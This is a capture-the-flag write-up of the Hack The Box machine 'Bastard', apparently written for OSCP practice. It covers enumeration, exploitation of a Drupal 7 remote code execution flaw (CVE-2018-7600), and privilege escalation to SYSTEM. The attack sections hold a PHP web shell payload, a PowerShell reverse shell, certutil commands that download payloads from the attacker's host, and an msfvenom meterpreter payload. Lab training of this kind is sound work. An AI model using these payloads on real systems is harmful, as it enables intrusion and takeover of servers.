Hack The Box - Bastard
Introduction
Bastard is a medium box, it is rated a 4.6 stars, which is pretty good. The box should be a good preparation for the OSCP. Let’s start enumerating the machine.
Enumeration
As always, I start with the nmap scan.
Nmap Scan
Basic scan of all ports:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/bastard]
└─$ nmap -sT -p- --min-rate 10000 bastard.htb -v
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-28 15:48 CEST
Initiating Ping Scan at 15:48
Scanning bastard.htb (10.10.10.9) [2 ports]
Completed Ping Scan at 15:48, 1.03s elapsed (1 total hosts)
Initiating Connect Scan at 15:48
Scanning bastard.htb (10.10.10.9) [65535 ports]
Discovered open port 80/tcp on 10.10.10.9
Discovered open port 135/tcp on 10.10.10.9
Discovered open port 49154/tcp on 10.10.10.9
Completed Connect Scan at 15:48, 13.54s elapsed (65535 total ports)
Nmap scan report for bastard.htb (10.10.10.9)
Host is up (0.027s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
49154/tcp open unknown
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 14.62 seconds
I perform a deep scan on those 3 open ports:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/bastard]
└─$ sudo nmap bastard.htb -p 80,135,49154 -AO
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-28 15:50 CEST
Nmap scan report for bastard.htb (10.10.10.9)
Host is up (0.053s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open unknown
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%),
Microsoft Windows Phone 7.5 or 8.0 (92%),
Microsoft Windows 7 or Windows Server 2008 R2 (91%),
Microsoft Windows Server 2008 R2 (91%),
Microsoft Windows Server 2008 R2 or Windows 8.1 (91%),
Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%),
Microsoft Windows 7 Professional or Windows 8 (91%),
Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%),
Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 41.87 ms 10.10.16.1
2 62.69 ms bastard.htb (10.10.10.9)
OS and Service detection performed.
Nmap done: 1 IP address (1 host up) scanned in 47.36 seconds
Services Enumeration
I only need to enumerate port 80, the other two are not relevant. Here are the results of the gobuster scan:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/bastard]
└─$ gobuster dir -u http://bastard.htb\
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\
-o gobuster.txt -x php,html,log,txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://bastard.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html,log,txt
[+] Timeout: 10s**2**
===============================================================
2021/08/28 15:56:47 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 7604]
/search (Status: 403) [Size: 1233]
/0 (Status: 200) [Size: 7604]
/user (Status: 200) [Size: 7441]
/themes (Status: 301) [Size: 149] [--> http://bastard.htb/themes/]
/modules (Status: 301) [Size: 150] [--> http://bastard.htb/modules/]
/copyright.txt (Status: 200) [Size: 1481]
/admin (Status: 403) [Size: 1233]
/scripts (Status: 301) [Size: 150] [--> http://bastard.htb/scripts/]
/tag (Status: 403) [Size: 1233]
/template (Status: 403) [Size: 1233]
On the page I can’t do many things, so I checked all the directories. But none of them were really helpful. I tried to create a new user named admin:
That username is already taken, but I can try to create another one (administrator):
This is a rabbit hole. The site is running drupal, so I use droopescan to enumerate the site:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/bastard]
└─$ droopescan scan drupal -u http://bastard.htb
[+] Plugins found:
ctools http://bastard.htb/sites/all/modules/ctools/
http://bastard.htb/sites/all/modules/ctools/CHANGELOG.txt
http://bastard.htb/sites/all/modules/ctools/changelog.txt
http://bastard.htb/sites/all/modules/ctools/CHANGELOG.TXT
http://bastard.htb/sites/all/modules/ctools/LICENSE.txt
http://bastard.htb/sites/all/modules/ctools/API.txt
libraries http://bastard.htb/sites/all/modules/libraries/
http://bastard.htb/sites/all/modules/libraries/CHANGELOG.txt
http://bastard.htb/sites/all/modules/libraries/changelog.txt
http://bastard.htb/sites/all/modules/libraries/CHANGELOG.TXT
http://bastard.htb/sites/all/modules/libraries/README.txt
http://bastard.htb/sites/all/modules/libraries/readme.txt
http://bastard.htb/sites/all/modules/libraries/README.TXT
http://bastard.htb/sites/all/modules/libraries/LICENSE.txt
services http://bastard.htb/sites/all/modules/services/
http://bastard.htb/sites/all/modules/services/README.txt
http://bastard.htb/sites/all/modules/services/readme.txt
http://bastard.htb/sites/all/modules/services/README.TXT
http://bastard.htb/sites/all/modules/services/LICENSE.txt
profile http://bastard.htb/modules/profile/
php http://bastard.htb/modules/php/
image http://bastard.htb/modules/image/
[+] Themes found:
seven http://bastard.htb/themes/seven/
garland http://bastard.htb/themes/garland/
[+] Possible version(s):
7.54
[+] Possible interesting urls found:
Default changelog file - http://bastard.htb/CHANGELOG.txt
Default admin - http://bastard.htb/user/login
[+] Scan finished (0:49:57.103603 elapsed)
I search for exploits, I only show the ones which may work for this version:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/bastard]
└─$ searchsploit drupal
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Drupal 7.x Module Services - Remote Code Execution | php/webapps/41564.php
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) | php/webapps/44448.py
Exploitation
I start with the download of the exploits, I start with the first one:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/bastard]
└─$ searchsploit -m exploits/php/webapps/41564.php
Exploit: Drupal 7.x Module Services - Remote Code Execution
URL: https://www.exploit-db.com/exploits/41564
Path: /usr/share/exploitdb/exploits/php/webapps/41564.php
File Type: ASCII text, with CRLF line terminators
Copied to: /hackthebox/oscp-prep/bastard/41564.php
I need to specify some more parameters, to find these directories, I use dirsearch:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/bastard]
└─$ python3 /tools/dirsearch/dirsearch.py -u http://bastard.htb/ -e php -x 403,404 -t 50
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php | HTTP method: GET | Threads: 50 | Wordlist size: 8929
Output File: /tools/dirsearch/reports/bastard.htb/-_21-08-29_14-21-30.txt
Error Log: /tools/dirsearch/logs/errors-21-08-29_14-21-30.log
Target: http://bastard.htb/
[14:21:37] Starting:
The /rest path is valid, it seems that this is the path I searched:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/bastard]
└─$ curl http://bastard.htb/rest
Services Endpoint "rest_endpoint" has been setup successfully.
I update the values in the exploit:
$url = 'http://bastard.htb';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';
$file = [
'filename' => 'shell.php',
'data' => '<?php system($_REQUEST["cmd"]); ?>'
];
The exploit did not correctly run and I was completely stuck. I searched through the internet and I found this exploit:
GitHub - pimps/CVE-2018-7600: Exploit for Drupal 7 <= 7.57 CVE-2018-7600
With this exploit, I can run commands on the system:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/bastard]
└─$ python3 CVE-2018-7600.py http://bastard.htb/ -c "whoami"
=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |
| by pimps |
=============================================================================
[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-251qq_kIBpi5dgeYvZGeQ9erpdho0xK8JS0fo6NIqGE
[*] Triggering exploit to execute: whoami
nt authority\iusr
I try to get a reverse shell:
$client = New-Object System.Net.Sockets.TCPClient('10.10.17.28',4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
$sendback = (iex $data 2>&1 | Out-String )
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
}
$client.Close()"
Download the shell:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/bastard]
└─$ python3 CVE-2018-7600.py http://bastard.htb/ -c "certutil.exe -urlcache -split -f http://10.10.17.28/shell.ps1 C:\temp\shell.ps1"
=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |
| by pimps |
=============================================================================
[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-yGId5VDw5khEsdeTHzZobbOIibazJwIWXygpNfi5FJ4
[*] Triggering exploit to execute: certutil.exe -urlcache -split -f http://10.10.17.28/shell.ps1 C:\temp\shell.ps1
**** Online ****
0000 ...
01fd
CertUtil: -URLCache command completed successfully.
The script transferred correctly, I can verify that:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/bastard]
└─$ python3 CVE-2018-7600.py http://bastard.htb/ -c "dir C:\temp"
=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |
| by pimps |
=============================================================================
[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-O-0VP_wk7_L9FAJohE4v5j7quSb7e2i-Ca-C6ckMQes
[*] Triggering exploit to execute: dir C:\temp
Volume in drive C has no label.
Volume Serial Number is 605B-4AAA
Directory of C:\temp
29/08/2021 04:46 �� <DIR> .
29/08/2021 04:46 �� <DIR> ..
29/08/2021 04:47 �� 509 shell.ps1
1 File(s) 509 bytes
2 Dir(s) 30.784.712.704 bytes free
I start a netcat listener and execute the script. It did not work, I tried other reverse shells, but also without success. Since that didn’t worked out, I try it with a meterpreter payload:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/bastard]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 --platform windows LHOST=10.10.17.28 LPORT=4444 -f exe >> shell.exe 130 ⨯
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
I transfer it to the machine:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/bastard]
└─$ python3 CVE-2018-7600.py http://bastard.htb/ -c "certutil.exe -urlcache -split -f http://10.10.17.28/shell.exe C:\temp\shell.exe"
=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |
| by pimps |
=============================================================================
[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-sWJCXbpg6TrCuqhnEyT0pfXxXwMZEncjyEimohCnnO0
[*] Triggering exploit to execute: certutil.exe -urlcache -split -f http://10.10.17.28/shell.exe C:\temp\shell.exe
**** Online ****
0000 ...
1c00
CertUtil: -URLCache command completed successfully.
Now, start a metasploit mutli/handler and run the script (I needed to reset the machine, something did not work at the first time.):
msf6 exploit(multi/handler) > set lhost tun0
lhost => 10.10.17.28
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.17.28:4444
[*] Sending stage (200262 bytes) to 10.10.10.9
[*] Meterpreter session 2 opened (10.10.17.28:4444 -> 10.10.10.9:49185) at 2021-08-29
msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information
-- ---- ---- -----------
2 meterpreter x64/windows NT AUTHORITY\IUSR @ BASTARD
msf6 exploit(multi/handler) > sessions 2
[*] Starting interaction with 2...
There is the shell, I can try to get the user flag.
User Flag
I can read the user flag:
C:\Users\dimitris\Desktop>type user.txt
type user.txt
ba**************************21a2
Privesc
Since I am already using metasploit, I can use the local exploit suggester:
msf6 exploit(freebsd/local/intel_sysret_priv_esc) > search local exploit suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(freebsd/local/intel_sysret_priv_esc) > use 0
msf6 post(multi/recon/local_exploit_suggester) > options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
I tried the exploits found but for some reason, ms16-075 does not work. So I tried ms16-014:
msf6 post(multi/recon/local_exploit_suggester) > search ms16_014
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/local/ms16_014_wmi_recv_notif 2015-12-04 normal Yes Windows WMI Receive Notification Exploit
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/local/ms16_014_wmi_recv_notif
msf6 post(multi/recon/local_exploit_suggester) > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_014_wmi_recv_notif) > options
Module options (exploit/windows/local/ms16_014_wmi_recv_notif):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.145 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 SP0/SP1
msf6 exploit(windows/local/ms16_014_wmi_recv_notif) > set lhost tun0
lhost => tun0
msf6 exploit(windows/local/ms16_014_wmi_recv_notif) > set lport 5555
lport => 5555
msf6 exploit(windows/local/ms16_014_wmi_recv_notif) > set session 2
session => 2
It’s time to run the exploit:
msf6 exploit(windows/local/ms16_014_wmi_recv_notif) > run
[*] Started reverse TCP handler on 10.10.17.28:5555
[*] Launching notepad to host the exploit...
[+] Process 1968 launched.
[*] Reflectively injecting the exploit DLL into 1968...
[*] Injecting exploit into 1968...
[*] Exploit injected. Injecting payload into 1968...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (200262 bytes) to 10.10.10.9
[*] Meterpreter session 3 opened (10.10.17.28:5555 -> 10.10.10.9:49186) at 2021-08-29 16:21:41 +0200
meterpreter > shell
Process 2880 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\inetpub\drupal-7.54>whoami
whoami
nt authority\system
There is the system shell. I can now move on and get the root flag.
Root Flag
I have a root shell, so I have permissions to read the root flag:
C:\inetpub\drupal-7.54>cd ..\..
cd ..\..
C:\>cd Users\Administrator
cd Users\Administrator
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 605B-4AAA
Directory of C:\Users\Administrator\Desktop
19/03/2017 08:33 <DIR> .
19/03/2017 08:33 <DIR> ..
19/03/2017 08:34 32 root.txt.txt
1 File(s) 32 bytes
2 Dir(s) 30.808.014.848 bytes free
C:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
4b**************************ba7c
Conclusion
This box was really hard for me. I know that I shall not use metasploit, but I think that was a good training. (And you could use metasploit in one box at the OSCP exam).
All in all it was a great experience.